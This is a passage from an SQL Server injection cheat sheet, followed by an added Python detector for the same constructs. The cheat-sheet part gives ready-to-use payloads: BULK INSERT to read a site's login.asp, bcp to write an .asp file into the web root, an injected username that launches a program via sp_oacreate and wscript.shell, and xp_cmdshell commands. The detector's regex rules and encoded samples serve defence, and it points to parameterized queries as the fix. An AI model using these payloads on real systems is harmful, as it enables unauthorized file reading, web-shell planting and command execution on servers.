SQL Injection Cheat Sheet Page 9

it like any other column; you don't need to supply a table name. You can also use it in
INSERT and UPDATE statements or in functions.
INSERT INTO members(id, user, pass) VALUES(1, ''+SUBSTRING(@@version,1,10) ,10)
Bulk Insert (S)
Inserts a file's content into a table. If you don't know the internal path of the web
application, you can read the IIS (IIS 6 only) metabase file
(%systemroot%\system32\inetsrv\MetaBase.xml) and then search it to identify the
application path.
1. Create table foo( line varchar(8000) )
2. bulk insert foo from 'c:\inetpub\wwwroot\login.asp'
3. Drop the temp table, and repeat for another file.
BCP (S)
Writes a text file. Login credentials are required to use this function.
bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar
VBS, WSH in SQL Server (S)
You can use VBS and WSH scripting in SQL Server because of its ActiveX support.
declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' --
Executing system commands, xp_cmdshell (S)
A well-known trick. By default it's disabled in SQL Server 2005. You need to have admin
access.
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'
Simple ping check (configure your firewall or sniffer to identify the request before
launching it):
EXEC master.dbo.xp_cmdshell 'ping <ip address>'
You cannot read the results directly from an error, a union or anything else.
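
Added example, not part of the original cheat sheet: detection logic in Python that normalizes request input and flags the SQL Server constructs used in the sections above (sp_oacreate/sp_oamethod, xp_cmdshell, BULK INSERT, @@version). The rule names, the sample inputs and the 192.0.2.1 documentation address are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructs named on this page, as they appear after normalization.
RULES = {
    "ole_automation": re.compile(r"\bsp_oa(?:create|method)\b"),
    "xp_cmdshell": re.compile(r"\bxp_cmdshell\b"),
    "bulk_insert": re.compile(r"\bbulk insert\b.+\bfrom\b"),
    "version_probe": re.compile(r"@@version\b"),
}

def normalize(raw, max_rounds=3):
    """Undo URL encoding (including double encoding), drop /* */ comments,
    collapse whitespace and lowercase, so the rules see one canonical form."""
    for _ in range(max_rounds):
        decoded = unquote_plus(raw)
        if decoded == raw:
            break
        raw = decoded
    raw = re.sub(r"/\*.*?\*/", " ", raw, flags=re.S)
    return re.sub(r"\s+", " ", raw).lower()

def match_rules(raw):
    """Return the sorted names of the rules that fire on one raw input."""
    text = normalize(raw)
    return sorted(name for name, rx in RULES.items() if rx.search(text))

# Constructed sample inputs (not captured traffic): one benign, the rest
# URL-encoded forms of statements shown on this page.
SAMPLES = [
    "user=alice&pass=correct+horse",
    "user=%27%3B+declare+%40o+int+exec+sp_oacreate+%27wscript.shell%27%2C+%40o+out+--",
    "id=1%3BEXEC%2520master.dbo.xp_cmdshell%2520%2527ping%2520192.0.2.1%2527",
    "id=1;BULK%09INSERT/**/foo+FROM+%27c:%5Cinetpub%5Cwwwroot%5Clogin.asp%27",
    "pass=%27%27%2BSUBSTRING(%40%40version%2C1%2C10)",
]

def scan(samples=SAMPLES):
    """Map each input to the rules it triggers; inputs with no hit are omitted."""
    return {s: hits for s in samples if (hits := match_rules(s))}

if __name__ == "__main__":
    for raw, hits in scan().items():
        print(hits, "<-", raw)
```

A hit is a triage indicator for the request path that produced it; the fix for that path remains parameterized queries.
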
Some Special Tables in SQL Server (S)
Error Messages
master..sysmessages
